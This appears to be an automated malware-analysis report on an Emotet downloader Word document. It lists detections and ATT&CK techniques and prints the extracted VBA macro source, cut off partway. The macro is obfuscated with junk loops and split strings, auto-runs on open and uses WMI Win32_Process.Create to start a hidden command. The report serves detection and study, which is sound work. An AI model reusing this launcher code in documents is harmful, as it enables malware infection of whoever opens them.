Verdict: MALICIOUS
Risk Score: 302

Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen function, which is a common technique for Emotet. The macro utilizes GetObject and CreateObject to instantiate WMI and launch a process, specifically targeting 'winmgmts' for process creation. This indicates the macro's intent is to download and execute a second-stage payload.
Heuristics (8)
- ClamAV: Doc.Downloader.Emotet-6964070-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Emotet-6964070-0
- VBA macros detected [medium, OLE_VBA_MACROS, 4 related findings]: Document contains VBA macro code
- VBA WMI Win32_Process launcher [critical, OLE_VBA_WMI_PROCESS_CREATE]: VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- Dangerous API name reassembled from split string literals [critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION]: VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenations is done only to evade keyword scanning.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- GetObject call [high, OLE_VBA_GETOBJ]: GetObject call
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4923 bytes |

SHA-256: 07d013dc8e3a355d9fe2cb46ffccf3608fbcbc4fe0c40ad5831a49038ff75185
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "s76753"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "i659_4"
Attribute VB_Base = "0{055885CB-4D23-42A8-9E8E-94D203285A59}{EEE211E3-0AA4-48A5-83A0-BAF936A399F4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "H48_782"
Attribute VB_Name = "G385441"
Attribute VB_Name = "C_757645"
Attribute VB_Name = "Z347027"
Attribute VB_Name = "i53486"
Attribute VB_Name = "t2550951"
Attribute VB_Base = "0{012F8316-9F9C-49C0-B0F4-F7B644B4DE4F}{7AC199C1-C367-4731-904F-20D826AB32FF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "O53012"
Function J42_489(F58898)
While v6924051 And w1___490
'H857588s359__A0033180n_863_36
Wend
While i7459943 And T1984215
'D50657l58028Z36542s3625924
Wend
Set J42_489 = CVar(F58898)
While i292831 And V02095
'h8798_S93423_r94792W_03804
Wend
While C9291856 And H_269176
'O034989A0442576z82092k618_51
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While c_8955 And F3026439
'J79106q896224i535311w067_0
Wend
While h282879 And n507_2
'V084148z3657578N_82471B5_7536
Wend
While Y86_477_ And G094_30
'N8_77680n74901__G_91078_f55021
Wend
Call X61664
While Y9884740 And E981060
'p45073K065687E33847z03238
Wend
While M469_0_ And I0_2931
'I9360213r376_4_4P234570p3___0
Wend
While D7684_ And Y_822219
'v3910444o66562o4921914W04257
Wend
End Sub
Attribute VB_Name = "C93518"
Function X61664()
On Error Resume Next
While v366838 And D88_42
'R7142248o7307_2o_2419N_00558
Wend
While v7662263 And Z299088
'Q99752_7z396425_w538453K190_33
Wend
While f438055 And o29819
'h6157567l637744J05981J46259
Wend
P115854 = i659_4.P4905_5 + t2550951.z__130 + i659_4.P4905_5.ControlSource + t2550951.K_0_21 + i659_4.P4905_5.PasswordChar + i659_4.P4905_5 + t2550951.M35945 + i659_4.P4905_5.PasswordChar + i659_4.P4905_5.PasswordChar + t2550951.j018245 + i659_4.P4905_5 + t2550951.Z1189_4 + i659_4.P4905_5.ControlTipText
While D4855741 And V8_0657
'v4559575n05_89t230_91q5396_
Wend
While i1_1669_ And b077_014
'w52510__V5539851D40368V8467193
Wend
While H2532_ And b078712
'I624411O00354W3621689P982703
Wend
Set T452521 = J42_489(GetObject("winmgmt" + "s:Wi" + "n3" + "2_Pr" + "ocess"))
While q5019527 And c0281_
'j62_649z09419J63872s383411
Wend
While q23189 And X832816
'd68362L2429176W56_712i84074
Wend
While J773572 And X119_84
'H3536876i_7_965G842717N62115
Wend
T452521.Create d09064 + P115854 + L97_717, U_015368, u10471, a80964
While i92_82 And c34_4505
'N364797O081866_T128_1j229202
Wend
While w27916 And u4_985
'U83759j898004_V50244_1a836_09
Wend
End Function
Attribute VB_Name = "O3541311"
Public Function u10471()
While Z59524 And R2290302
'z_59_0w031543Z8307707o8309_
Wend
While G7463_72 And q341043
'j887856K570484G88707V266717
Wend
While O726542 And S12124_2
'B3424992o63624l8431503P09025
Wend
Set u10471 = J42_489(GetObject("winmgmt" + "s:Wi" + "n3" + "2_Pr" + "ocess" + "S" + "tartup"))
While D1383169 And X19165
'c522639S67699O1591705R03_991
Wend
While G757379 And C01456
'E23862u3736_v92703v1021064
Wend
c052037 = vbError - vbError
While
```

... (truncated)